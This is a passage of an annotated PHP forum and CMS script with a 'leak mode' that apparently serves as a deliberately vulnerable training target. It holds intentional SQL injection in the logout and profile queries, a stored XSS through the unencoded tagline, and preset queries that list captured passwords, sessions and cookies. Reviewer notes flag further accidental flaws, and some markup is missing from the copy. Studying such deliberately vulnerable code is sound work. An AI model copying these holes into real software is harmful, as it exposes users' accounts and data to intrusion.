message='".$sql['es'](strtr($_POST['message'],$html))."'
where status is not null and id = $var[0]"))
$request = 'Blog';
# Save forum post
// A new post is accepted from a logged-in user or, with $gast set, from a guest. max must equal
// the newest post id unless the newest post was written by someone else. A recipient given in
// mail must be the id of an active user; the parent path is read from the database by numeric id.
elseif($var = array('') and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['title']) and isset($_POST['max']) and isset($_POST['message']) and $_POST['message'] != ''
and ($uid or $gast) and ($_POST['max'] == $sql['sq']($conn,'select max(id) from [forum]') or (($gast) ? 0 : $uid) != $sql['sq']($conn,"
select userid
from [forum]
where id = (select max(id)
from [forum])")) and ($_POST['mail'] == '' or preg_match('/^\d+$/',$_POST['mail'],$var) and $sql['sq']($conn,"
select id
from [user]
where status is not null and id=$var[0]")) and $sql['e']($conn,"
insert into [forum] ([create],[change],[status],[userid],[mailid],[ip],[useragent],[path],[title],[message])
values (datetime('now','localtime'),datetime('now','localtime'),
".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? $val[0]%2 : 0).",
".(($uid) ? $uid : 0).",
nullif('$var[0]',''),
'$addr',
'".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
nullif('".((isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$val) and $val = $sql['sq']($conn,"select ifnull(path,'/')||id||'/' from [forum] where id=$val[0]")) ? $val : '')."',''),
nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
'".$sql['es'](strtr($_POST['message'],$html))."')"))
$request = ($var[0]) ? (($var[0] == $uid) ? 'Blog' : 'Mail') : '';
}
else
$out .= "
";
}
# Delete mails
// A message is hidden (status set to NULL) only when the caller is its recipient (mailid).
// NOTE(review): this state change is triggered by a GET parameter and no request token is
// checked in the lines visible here; /\d+/ is unanchored, so the first digit run is used.
if(preg_match('/Blog|Mail/',$request) and $uid and isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var) and $uid == $sql['sq']($conn,"select mailid from [forum] where id = $var[0]"))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
# Save tagline
// Stores the tagline for the caller, or for the account in id when the caller has the admin bit.
// NOTE(review): the value is read from $_REQUEST, so a GET request changes it too, and it is
// SQL-escaped but stored without HTML encoding. The forum form in this file HTML-maps the
// tagline on display except in leak mode.
if($uid and !isset($_REQUEST['stop']) and !isset($_REQUEST['test']) and isset($_REQUEST['tl']))
$sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
tagline=nullif('".$sql['es']($_REQUEST['tl'])."','')
where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid));
# Log out
// Clears status bit 0 and the chat column for the caller, or for the account in ?id when the
// caller's own row has status%4 = 3.
// In leak mode $_GET['id'] is placed into the SQL text unchanged (the SQL injection point of the
// training mode); otherwise everything but digits is removed first.
// NOTE(review): '!' binds tighter than '/' and '%', so !$status/2%2 is ((!$status)/2)%2, which is
// 0 for every $status. The last condition therefore reduces to !isset($_GET['id']); the intent
// was probably !($status/2%2).
if(preg_match('/^Abmelden\s?$/',$request)) {
if($sql['e']($conn,"
update [user] set status=(status/2%8*2),
chat=null,
change=datetime('now','localtime')
where ".((isset($_GET['id']) and $_GET['id']) ? "(select status%4 from [user] where id=nullif('$uid',''))=3 and id=".(($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id']))
: "id='$uid' and status%2=1")) and $sql['c']($conn) and (!$status/2%2 or !isset($_GET['id']))) {
// Own logout: drop the session data and expire the persistent login cookie.
session_unset();
if(isset($_COOKIE['login'])) {
setcookie('login',0,time()-$ctl,$self);
unset($_COOKIE['login']);
}
}
// if(substr($request,-1) != ' ')
$request = '';
$uid = $status = false;
}
# Login form
// Prepends the login form to $out for visitors who are not logged in; the form markup itself is
// empty in this copy, and parts of the second pattern in the condition are garbled.
if(!$uid and (!preg_match('/^(Anmelden|Kennwort|SQL|Beitrag|Creole)$/',$request,$var) and !$info[3] and (($user or !$lone) and !$content or !is_array($content) and preg_match('/(<|<){3}login(\d?)(>|>){3}/i',$content,$var) or $request == 'Login') or !$inet and !$local and trim($request) == 'Impressum')) {
// Pre-fill the user name from the username cookie. In leak mode the cookie is taken unchanged.
// NOTE(review): the character class in the other branch is negated, so it keeps the leading run
// of characters outside the allow-list and drops the rest - the opposite of the login filter,
// which removes [^\w.:@\[\]-]. An ordinary name ends up empty. Probably meant:
// '/^([\w.:@\[\]-]*).*$/'. The value needs HTML encoding where it is printed in either case.
if(!(isset($post['username']) and $post['username']) and isset($_COOKIE['username']) and $_COOKIE['username'])
$post['username'] = ($leak) ? $_COOKIE['username'] : preg_replace('/^([^\w.:@\[\]-]*).*$/','$1',$_COOKIE['username']);
if(!$leak and $hash)
$head['hash'] = "";
$out = "
$out";
}
# File upload
// Upload, edit, delete and list files of the logged-in user. File content is kept in the [file]
// table as base64 text; a negative size marks content that was deflated before storing.
if($uid and $request == 'Datei') {
// Bytes already stored for this user.
$len = $sql['sq']($conn,"select sum(abs(size)) from [file] where user = $uid and status is not null");
// NOTE(review): file_exists() on tmp_name is used here; is_uploaded_file() is the check that
// ties the path to this request's upload.
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name'])) {
// The stored name keeps only word characters and "!,.-".
$name = preg_replace('/[^\w!,.-]/','',((isset($_POST['name']) and $_POST['name'] != '') ? $_POST['name'] : $_FILES['file']['name']));
// NOTE(review): '!' binds tighter than '/' and '%', so !$status/2%2 is ((!$status)/2)%2, which is
// 0 for every $status. Both conditions below are therefore always false: neither the quota
// ($maxfile) nor the extension allow-list ($type) ever rejects an upload. The intent was
// probably !($status/2%2), i.e. "caller is not an administrator".
if(!$status/2%2 and ($len + $_FILES['file']['size']) > $maxfile)
$out .= "
Sie haben ihren Datei-Upload Content um ".number_format(($len - $maxfile),0,',','.')." Bytes überschritten!
";
elseif(!$type = array_search(strtolower(preg_replace('/^.*?\.(\w+)$/','$1',$name)),$type) and !$status/2%2)
$out .= "
Ihr Datei-Upload besitzt einen nicht erlaubten Datei-Type!
";
else {
$data = file_get_contents($_FILES['file']['tmp_name']);
// NOTE(review): CRC32 is a checksum, not a collision-resistant digest. The duplicate lookup
// below links the new row to any stored file with the same CRC32 and size, so two different
// files with equal values would share content; hash('sha256', $data) avoids that.
$crc = str_pad(dechex(crc32($data)),8,0,STR_PAD_LEFT);
$size = strlen($data);
$len += $size;
// Column => SQL fragment. A duplicate only stores a link; otherwise size, hash, type and data
// are stored.
// NOTE(review): [status] is the sum of two request fields for every uploader and is not clamped;
// the MIME type is the one sent by the client, filtered to a character set.
$var = array_merge(array(
'[create]' => "datetime('now','localtime')",
'[status]' => (int)$_POST['right'] + (int)$_POST['status'],
'[user]' => $uid,
'[name]' => "'$name'",
'[ip]' => "'$addr'",
'[useragent]' => "nullif('".$sql['es']($_SERVER['HTTP_USER_AGENT'])."','')",
'[info]' => "nullif('".$sql['es'](strtr($_POST['info'],$html))."','')"),
($link = $sql['sq']($conn,"select id from [file] where link is null and hash = '$crc' and abs(size) = $size")) ? array('[link]' => $link) : array(
'[size]' => $size,
'[hash]' => "'$crc'",
'[type]' => (($type) ? "nullif('".preg_replace('![^\w/ ;=+-]!','',$_FILES['file']['type'])."','')" : "null"),
'[data]' => "'".base64_encode($data)."'"));
// Store the deflated form when it is smaller and flag it with a negative size.
if(isset($var['[data]']) and $data = $gz['deflate']($data,9) and strlen($data) < $size) {
$var['[data]'] = "'".base64_encode($data)."'";
$var['[size]'] *= -1;
}
// A file of the same user with the same name is overwritten in place.
if($val = $sql['sq']($conn,"select id from [file] where status is not null and user = $uid and name like ".$var['[name]']." limit 1")) {
// $sql['e']($conn,"update [file] set status = null where id = $val");
$key = array();
foreach($var as $k => $v)
$key[] = "$k = $v";
if(!@$sql['e']($conn,"update [file] set\n\t".implode(",\n\t",$key)."\nwhere id = $val"))
$var = false;
}
elseif(!@$sql['e']($conn,"insert into [file] (".implode(',',array_keys($var)).") values (".implode(',',array_values($var)).")"))
$var = false;
if(!$var)
$out .= "
Datei konnte nicht verarbeitet werden!
";
}
}
// Edit the metadata of an existing file; callers without the admin bit are limited to their own rows.
// NOTE(review): info is only SQL-escaped here, while the upload path above also applies
// strtr(...,$html) to it.
elseif(isset($_POST['send']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)) {
$sql['e']($conn,"
update [file] set
status = ".((int)$_POST['right'] + (int)$_POST['status']).",
name = '".preg_replace('/[^\w!&,.-]/','',$_POST['name'])."',
info = '".$sql['es']($_POST['info'])."'"
.(($status/2%2 and isset($_POST['type'])) ? ",\n\t\ttype = ".((preg_match('![\w/ ;=+-]+!',$_POST['type'],$val)) ? "'$val[0]'" : "null") : "")."
where status is not null and id = $var[0]".(($status/2%2) ? "" : " and user = $uid "));
// Optionally replace the charset parameter of a text/* type.
if(isset($_POST['charset']) and preg_match('/^[\w-]+$/',$_POST['charset'],$val) and $var = $sql['aq']($conn,"
select ifnull(b.id,a.id) as id,
ifnull(b.type,a.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.status is not null and ifnull(a.type,b.type) like 'text/%'".(($status/2%2) ? "" : " and a.user = $uid")." and a.id = $var[0]"))
$sql['e']($conn,"
update [file] set
type = '".preg_replace('!^([\w/-]+).*$!','$1',$var[0]['type'])."; charset=$val[0]'
where id = ".$var[0]['id']);
}
// Delete in two stages: the first request hides the file (status NULL), a second request for an
// already hidden id moves the content to a row that links to it and removes the row.
// NOTE(review): hiding is limited to the owner or an administrator, but the removal branch has
// no owner/admin condition, and both are triggered by a GET parameter.
elseif(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
if($sql['sq']($conn,"select 1+status from [file] where id = $var[0]"))
$sql['e']($conn,"update [file] set status = null where (user = $uid or $status/2%2) and id = $var[0]");
else
$sql['e']($conn,strtr("begin;
update [file] set
size = (select size from [file] where id = #),
hash = (select hash from [file] where id = #),
type = (select type from [file] where id = #),
data = (select data from [file] where id = #)
where id = (select id from [file] where link = # limit 1);
update [file] set link = (select id from [file] where link = # and data is not null)
where link = #;
update [file] set link = null where id = link;
delete from [file] where id = #;
commit;",array('#' => $var[0])));
// Administrators can make a hidden file visible again.
elseif($status/2%2 and isset($_GET['restore']) and preg_match('/\d+/',$_GET['restore'],$var))
$sql['e']($conn,"
update [file]
set status = 1
where id = $var[0]");
// Listing: own visible files, or for an administrator the files of user $mid (all users when
// $mid is negative). $mid, $paging and $sorth are set outside this excerpt.
$data = (($status/2%2 and !is_bool($mid)) ? (($mid < 0) ? '' : "where a.user = $mid") : "where a.user = $uid and a.status is not null");
$num = $sql['sq']($conn,"select count(*) from [file] as a $data");
if($page[0] == '')
$page = array(1,"page=1");
// The return value is discarded; presumably the pattern is used for its side effects - confirm.
preg_replace($paging[5],$paging[6],"$num,$max,#key#");
if($rows = $sql['aq']($conn,"
select a.name as name,
abs(ifnull(a.size,b.size)) as absize,
a.user||'-'||a.name as flink,
a.id as id,
u.username as uname,
a.ip as ip,
ifnull(a.status/2%2,1) as status,
a.status%2 as right,
a.[create],
ifnull(a.hash,b.hash) as hash,
a.info as info,
ifnull(a.type,b.type) as type,
a.useragent as agent,
a.link as link,
a.user as user,
ifnull(a.size,b.size) as size,
ifnull(length(a.data),0) as truesize,
strftime('%d.%m.%Y %H:%M:%S',a.[create]) as erstellt
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
$data".preg_replace($sorth[2],$sorth[3],'u.id,a.name;11;a.name')."
limit $val,$max",SQLITE_ASSOC)) {
$row = array(); // user
$val = ($status/2%2 and $mid) ? "&user=$mid" : false;
$key = 0;
// The row template is empty in this copy. name, info, type and agent come from uploaders and need
// HTML encoding when they are printed.
foreach($rows as $var)
$row[] = "
X";
$out .= "";
}
// Values for the edit form: the selected file or empty defaults.
$row = ($id and $row = $sql['aq']($conn,"
select a.status as status,
a.name as name,
a.info as info,
ifnull(a.type,b.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.id = $id")) ? reset($row) : array('name' => '', 'info' => '', 'status' => 1, 'type' => '');
$val = ($status/2%2) ? (($mid == -1) ? array($key,'insgesamt belegt') : array($len,'belegt')) : array($maxfile-$len,'frei');
$out .= "";
}
# Administrator tools
// NOTE(review): 'and' binds tighter than 'or', so a non-empty $info[3] opens this section even
// without a logged-in administrator. $info[3] is set outside this excerpt - confirm what can
// set it.
if($uid and $status/2%2 or $info[3] != '') {
$info[4] = "|>-\n|--[ [[^Backup]] ~| [[^CMS]] ~| [[^SQL|SQL-Konsole]] ~| [[^Status]] ]--|\n";
// The menu line is rendered through the $creole pattern table; errors are suppressed with @.
if(preg_match('/^(cms|backup|sql|status)$/i',$request))
$info[8] = @preg_replace(array_keys($creole),array_values($creole),"$info[4]--");
// Status page: user counters (status bit 1 set, bit 0 set, bit 0 clear), total logins and
// requests, and the number of IP addresses shared by more than one account.
if($request == 'Status' and array_sum($var = reset(($sql['aq']($conn,"
select (select count(*) from user where status/2%2),
(select count(*) from user where status%2),
(select count(*) from user where status%2 = 0),
(select sum(logins) from user),
(select sum(requests) from user),
(select count(*) from (select count(*) from [user] group by ip having count(*) > 1))",SQLITE_NUM))))) {
$out .= "$info[8]
";
$out .= "
";
}
if($request == 'Backup') { // Backup Database
// $var: an uploaded file if one was sent, otherwise the existing backup "$base.gz".
// NOTE(review): the backup is written next to the database file. If $base lies inside the web
// root, both files are reachable by URL unless the server blocks them - confirm the location.
$var = (isset($_FILES['sqlite']['tmp_name']) and !$_FILES['sqlite']['error'] and file_exists($_FILES['sqlite']['tmp_name'])) ? $_FILES['sqlite']['tmp_name'] : "$base.gz";
if($query == 'reorg')
$sql['e']($conn,"vacuum");
// Create the gzip backup unless one exists and overwriting ($owbu) is off.
elseif(isset($_POST['create']) and (!file_exists("$base.gz") or $owbu) and ($fr=fopen($base,'rb')) and ($fw=$gz['open']("$base.gz",'wb9'))) {
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
}
// NOTE(review): restore unpacks the uploaded file (or the stored backup) over the live database
// without checking its content, so it replaces every table including the accounts. It is
// only as safe as the gate at the top of this section.
if($var != "$base.gz" or isset($_POST['reset'])) { // Restore
$sql['cl']($conn);
if(($fr=$gz['open']($var,'rb')) and ($fw=fopen($base,'wb'))) {
while(!$gz['eof']($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@touch($base,filemtime($var));
header("Location: $self");
die("Weiter zum Forum");
}
}
// basename() confines the download to the first path segment of $base, and the extension of
// $base is appended.
// NOTE(review): the registered media type is application/octet-stream, and Content-Disposition
// normally starts with a disposition type such as "attachment;".
elseif(isset($_GET['download']) and file_exists($var = preg_replace('/\/.*$/','',$base)."/".basename($_GET['download']).strrchr($base,'.')) and is_file($var)) { // Save Fail-DB
header('Content-Type: application/octetstream');
header('Content-Disposition: filename="'.basename($var).'"');
header('Content-Length: '.filesize($var));
readfile($var);
exit();
}
elseif(isset($_POST['backup']) or $query == 'download') { // Save DB
$var = ($query and file_exists("$base.gz")) ? file_get_contents("$base.gz") : $gz['encode'](file_get_contents($base),9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.basename($base).'.gz"');
header('Content-Length: '.strlen($var));
die($var);
}
// SQL dump of all tables; dt adds drop/delete statements, ct emits the create statements.
elseif(isset($_REQUEST['sqldump']) and $tables = $sql['q']($conn,"select name,sql from sqlite_master where type='table' and name not like 'sqlite_%'")) { // Make SQL-Dump
$eol = "\r\n";
$val = "begin;$eol";
while($table = $sql['fa']($tables,SQLITE_ASSOC)) {
$val .= ((isset($_REQUEST['dt'])) ? ((isset($_REQUEST['ct'])) ? "drop table" : "delete from")." [$table[name]];$eol" : "")
.((isset($_REQUEST['ct'])) ? "$table[sql];" : "/* ".$table['sql']." */").$eol;
if($lines = $sql['q']($conn,"select * from [$table[name]]")) {
$cols = $sql['nf']($lines);
$name = array();
for($a=0; $a<$cols; $a++)
$name[] = "[".$sql['fn']($lines,$a)."]";
while($line = $sql['fa']($lines,SQLITE_NUM)) {
// NULL stays null, plain numbers stay bare, everything else is escaped and quoted.
foreach($line as $key => $var)
$line[$key] = (is_null($var)) ? 'null' : ((preg_match('/^(0|-?[1-9]\d*(\.\d+)?)$/',$var)) ? $var : "'".$sql['es']($var)."'");
$val .= "insert into [$table[name]] (".implode(",",$name).") values (".implode(",",$line).");$eol";
}
}
}
$val = $gz['encode']($val."commit;$eol",9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.preg_replace('/(?<=\.)\w+$/','sql',basename($base)).'.gz"');
header('Content-Length: '.strlen($val));
die($val);
}
else
$out .= "$info[8]
";
}
# Administration of forum posts
// Runs inside the administrator section: kill removes a post, lock hides it (status NULL), save
// makes a hidden post visible again (status 0), edit rewrites all of its columns.
// NOTE(review): kill, lock and save change data from GET parameters, and no request token is
// checked in the lines visible here.
if($request == 'Admin') {
if(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
$sql['e']($conn,"delete from [forum] where id=$var[0]");
elseif(isset($_GET['lock']) and preg_match('/\d+/',$_GET['lock'],$var))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
elseif(isset($_GET['save']) and preg_match('/\d+/',$_GET['save'],$var))
$sql['e']($conn,"update [forum] set status=0 where status is null and id=$var[0]");
if(isset($_GET['edit']) and preg_match('/\d+/',$_GET['edit'],$var)) {
if(isset($_POST['edit']) and isset($_POST['message']) and $_POST['message'] != '') {
// Title and message are HTML-mapped and SQL-escaped; the numeric fields are reduced to digits
// (path to digits and '/').
// NOTE(review): status, userid, mailid and path are read without isset(), and userid is placed
// unquoted, so an empty userid yields a malformed statement.
$sql['e']($conn,"
update [forum] set change=datetime('now','localtime'),
changes=changes+1,
title=nullif('".((isset($_POST['title'])) ? $sql['es'](strtr($_POST['title'],$html)) :'')."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."',
status=nullif('".preg_replace('/\D/','',$_POST['status'])."',''),
userid=".preg_replace('/\D/','',$_POST['userid']).",
mailid=nullif('".preg_replace('/\D/','',$_POST['mailid'])."',''),
path=nullif('".preg_replace('/[^\d\/]/','',$_POST['path'])."','')
where id=$var[0]");
$request = ($mid or $_POST['mailid']) ? (($_POST['mailid'] == $_POST['userid']) ? 'Blog' : 'Mail') : '';
if(!$q)
$q = $var[0];
}
else {
// Show the edit form for the post.
$wrt = array();
if($getopt != '')
$wrt[] = $getopt;
if($page[1] != '')
$wrt[] = $page[1];
$wrt = "$self/Admin?".implode('&',$wrt).((count($wrt) > 0) ? '&' : '');
$line = reset(($sql['aq']( $conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.userid as userid,
f.mailid as mailid,
f.ip as uip,
f.useragent as ua,
f.status as status,
ifnull(f.status%2,'-1') as right,
f.path as path,
f.title as title,
f.message as message,
u.username as author
from [forum] as f
left join [user] as u on u.id = f.userid
where f.id=$var[0]",SQLITE_ASSOC)));
// Posted values replace the stored ones for redisplay.
// NOTE(review): they are copied unchanged; the form markup is empty in this copy, so whether
// they are HTML-encoded on output cannot be seen here.
foreach($_POST as $k => $v)
if(preg_match('/^(title|message|userid|mailid|path|status)$/',$k))
$line[$k] = $v;
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $line['id'], 'name' => $line['id'], 'title' => $line['title'], 'from' => $line['author'], 'create' => $line['create'], 'change' => $line['change'], 'right' => $line['right']));
$array = array();
// Build the author and recipient lists and resolve both ids to user names.
foreach($sql['aq']($conn,"select id,username from user") as $v) {
$array['user'][] = "";
$array['mail'][] = "";
if($v['id'] == $line['userid'])
$line['from'] = $v['username'];
if($v['id'] == $line['mailid'])
$line['to'] = $v['username'];
}
$out .= "";
}
}
else
$request = '';
}
}
// Callers who did not pass the gate of the administrator section have an Admin or Backup request
// cleared.
elseif(preg_match('/Admin|Backup/',$request))
$request = '';
# Content management system
// Open to administrators, and to logged-in users for pages whose right bits (status/2%4) equal 2.
// NOTE(review): $id is placed into the LIKE comparison quoted but not escaped here; it is set
// outside this excerpt - confirm that it is numeric.
if((($request == 'CMS' or isset($_REQUEST['request']) and $_REQUEST['request'] == 'CMS') and $uid) and ($status/2%2 or $status%2 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where id like '$id' or name like '".$sql['es'](trim($q))."'") == 2)) {
if(count($_POST) and !isset($_POST['stop'])) {
// Field => character class. The first run of allowed characters is kept and HTML-mapped;
// content allows every byte except NUL. Only administrators may set the extra fields.
$post = array('name' => '\w.-', 'content' => '^\x00');
if($status/2%2)
$post = array_merge($post,array('description' => '^\n', 'menu' => '\d', 'public' => '\d', 'right' => '\d-', 'id' => '\d', 'create' => '\d', 'change' => '\d'));
foreach($post as $key => $var)
$post[$key] = (isset($_POST[$key]) and preg_match('/['.$var.']+/',$_POST[$key],$val)) ? strtr($val[0],$html) : false;
if(isset($_POST['save']) and $_POST['save'] and isset($_POST['name']) and !preg_match("/^\s*$ncms\s*$/",$_POST['name'])) {
// Status value: right*2 + menu + public*8.
if($status/2%2)
$var = (int)$post['right']*2 + ((isset($post['menu'])) ? $post['menu'] : 0) + ((isset($post['public'])) ? $post['public']*8 : 0);
// Existing page: non-administrators change the content only. name goes into the SQL text
// unescaped, which relies on its character class admitting no quote.
if($id)
$sql['e']($conn,"
update [cms] set
change=datetime('now','localtime'),
changes=changes+1,".(($status/2%2) ? "
status=$var,
name='$post[name]',
description=nullif('".$sql['es']($post['description'])."','')," : "")."
content=nullif('".$sql['es']($post['content'])."','')
where id = $id");
elseif($status/2%2)
$sql['e']($conn,"
insert into [cms] ([create],[change],[status],[name],[description],[content])
values( datetime('now','localtime'),datetime('now','localtime'),
$var,
'$post[name]',
nullif('".$sql['es']($post['description'])."',''),
nullif('".$sql['es']($post['content'])."',''))");
$id = $content = true;
$request = ($post['name'] != '') ? "$post[name] " : ' ';
}
elseif(isset($_POST['remove']) and $id and $status/2%2) {
$sql['e']($conn,"delete from [cms] where id = $id");
$id = $post = false;
}
}
else
$post = false;
if(!$id and $q !== false)
$id = $sql['sq']($conn,"select id from [cms] where name like '".$sql['es']($q)."'");
// Load the stored page for the editor, or start from empty defaults.
if(!$post and $id and $var = $sql['aq']($conn,"
select id,
name,
strftime('%s',change) as change,
strftime('%s',[create]) as 'create',
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
content
from [cms]
where id = $id",SQLITE_ASSOC))
$post = reset($var);
elseif(!$post)
$post = array('id' => 0, 'name' => '', 'menu' => 0, 'public' => 0, 'right' => -2, 'description' => '', 'content' => '', 'create' => '', 'change' => '');
// Preview: the posted page is handed to the Creole renderer via $creolevar; the key 'name' is
// given twice with the same value.
if(count($_POST) and $post['content'] != '' and $creolevar = array_merge($creolevar,array('type' => 'cms', 'id' => $post['id'], 'name' => $post['name'], 'create' => $post['create'],
'change' => $post['change'], 'name' => $post['name'], 'title' => $post['description'], 'right' => $post['right'], 'from' => $sql['sq']($conn,'select username from user where status/2%2 = 1'))))
$out .= "
";
}
}
}
if($sql) {
# SQLite terminal with optional predefined queries for the XSS attacks
// Reachable for administrators, when $info[3] is non-empty, or in leak mode with a query string.
// In leak mode the presets list the newest 25 rows of the [worm] and [xss] tables, which hold
// the data captured by the training attacks (user, pass, sess, data columns).
if(($leak and $query or $info[3] != '' or $status/2%2) and $request == 'SQL') {
$val = '';
$q = false;
if($leak) {
// The preset name is only compared against fixed words, never placed into SQL.
$set = (preg_match('/\w+/',$query,$var)) ? $var[0] : ((isset($_POST['preset'])) ? $_POST['preset'] : '');
if($set == "worm")
$q = "
select *
from [worm]
order by id desc
limit 0,25";
elseif(preg_match('/(cookie|account)/',$set))
$q = "
select x.id as ID,
i.hits as Hits,
strftime('%d.%m.%Y %H:%M:%S',[create]) as 'Datum/Zeit',
href as Url,".(($set == 'account') ? "
user as Username,
pass as Password," : "
sess as Session,
data as Cookie,")."
useragent as UserAgent
from [xss] as x
inner join ( select max(id) as id,
count(*) as hits
from [xss]".(($set == 'account') ? "\n\twhere user is not null and pass is not null" : "")."
group by ".(($set == 'cookie') ? "sess,data" : "user,pass")."
) as i on i.id = x.id
order by x.id desc
limit 0,25";
$array = array(
'account' => 'Accountdaten',
'cookie' => 'Cookies und Sessions',
'worm' => 'Daten vom Wurm',
'sqlite' => 'SQLite Mastertabelle');
foreach($array as $key => $var)
$array[$key] = "";
$val = "";
}
// Free-form console: the statement comes from the query field, from an uploaded file, or is a
// "select *" on the chosen table (reduced to word characters).
// NOTE(review): this executes arbitrary SQL by design and is equivalent to full control of the
// database, so it is only as safe as the condition that guards it ($info[3] is set outside this
// excerpt).
if($status/2%2 or $info[3] != '') {
if($leak and $set == 'sqlite')
$q = "select * from $sql[m]";
// NOTE(review): $sql['sq'] is used as a single-value query elsewhere in this file, yet its result
// is iterated here - confirm what it returns for several rows.
$array = $sql['sq']($conn,"select name from $sql[m] where type = 'table'");
foreach($array as $key => $var)
$array[$key] = "";
$val = " $val";
if(!$q and isset($_POST['query']) and $_POST['query'] != "")
$q = $_POST['query'];
else
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name']))
$q = implode('',$gz['file']($_FILES['file']['tmp_name']));
if(!$q and isset($_POST['table']) and $_POST['table'] != '')
$q = "select * from [".preg_replace('/\W/','',$_POST['table'])."]";
$out = "$info[8]";
}
// exec runs the statement through $sql['e'] (administrator or $info[3] only), otherwise it is
// run as a query; errors are suppressed with @.
// NOTE(review): the status line printed afterwards discloses the SQLite version, php_uname(),
// the PHP version and the SAPI to whoever reaches this page.
if($q)
if($result = (isset($_POST['exec']) and ($status/2%2 or $info[3] != '')) ? @$sql['e']($conn,$q) : @$sql['q']($conn,$q)) {
if((!is_object($result) and $var = $sql['c']($conn)) or is_object($result) and !$sql['nf']($result) or (is_bool($result) or !$sql['nf']($result)))
$out .= "
Es wurden ".preg_replace('/^0$/','keine',$var)." Einträge geändert!
";
$out .= "SQLite ".$sql['lv']()." ".php_uname()." (PHP ".phpversion()."/".php_sapi_name().") - Charset: ".$sql['lc']()."";
}
# Forum form
// Builds the form for a new post or a reply. The form markup itself is empty in this copy.
if($request == 'Beitrag' and ($uid or $gast) and $rw) {
// The post id from the form must consist of digits only (anchored pattern).
if(!$id and isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$var))
$id = $var[0];
// Load the referenced post; only posts without a recipient or addressed to the caller are found.
if($id and ($var = $sql['aq']($conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.title as title,
f.message as message,
f.status,
ifnull(f.status%2,'-1') as right,
u.status,
u.username as username,
f.userid as userid,
f.mailid as mailid
from [forum] as f
left join user as u on f.userid = u.id and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and u.status is not null
where f.id = $id and (f.mailid is null or f.mailid = nullif('$uid',''))
limit 1"))) {
$var = reset($var);
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'create' => $var['create'], 'right' => $var['right'], 'from' => $var['username']));
if(!isset($_POST['message']))
$out .= " ";
}
else
$var = array('id' => '');
// Title and message for redisplay are passed through the $phtml patterns, which are defined
// outside this excerpt - presumably an encoding step, confirm.
$val = preg_replace($phtml[0],$phtml[1],((isset($_POST['title'])) ? $_POST['title'] : ((isset($var['title'])) ? $var['title'] : "")));
$line = preg_replace($phtml[0],$phtml[1],((isset($_POST['message'])) ? $_POST['message'] : ((count($var) > 1 and $var['mailid'] === $var['userid']) ? $var['message'] : '')));
// NOTE(review): the recipient is taken from the request unchanged; it needs encoding where it is
// printed.
if(isset($_REQUEST['mail']))
$wrt = $_REQUEST['mail'];
elseif(isset($var['mailid']))
$wrt = $var['mailid'];
else
$wrt = false;
if(isset($_POST['message']))
$out .= " ";
// Recipient list: all active users, the caller first.
$usr = $sql['aq']($conn,"
select u.id as id,
u.username as username
from [user] as u
left join [user] as s on u.id = s.id and s.id ".(($uid) ? "= $uid" : "is null")."
where u.status is not null
order by s.id desc,u.username");
foreach($usr as $k => $v)
$usr[$k] = "";
// Name and tagline of the recipient. The tagline is HTML-mapped unless leak mode is on or it is
// NULL, so in leak mode the stored text is passed on unencoded (the stored-XSS case of the
// training mode).
$k = (isset($_REQUEST['mail']) and preg_match('/\d+/',$_REQUEST['mail'],$v) and $k = $sql['aq']($conn,"select username,tagline from [user] where id=$v[0]")) ? array($k[0]['username'],(($leak or is_null($k[0]['tagline'])) ? $k[0]['tagline'] : strtr($k[0]['tagline'],array_slice($html,1)))) : false;
$out .= "";
}
# Show user profile: loads one user row plus per-user counters for the profile and edit views.
// NOTE(review): as extracted, this section opens four braces and closes three; text inside the emptied output string
// was probably lost -- TODO confirm the structure against the original file.
if(preg_match('/(Profil|Bearbeiten)/',$request)) {
// Profile id to show: $mid, else $id, else the current user's $uid.
$var = ($mid) ? $mid : (($id) ? $id : $uid);
if((!$lone or $user or $uid) and $var) {
// $var is interpolated into every subquery; it is assigned from $mid/$id/$uid, which are set outside this view
// -- confirm they are always numeric.
// NOTE(review): on the last line of the query, id= receives $_GET['id'] verbatim when $leak is truthy; with $leak off
// every non-digit is stripped first. The raw branch appears to be the deliberate SQL-injection exercise of leak mode,
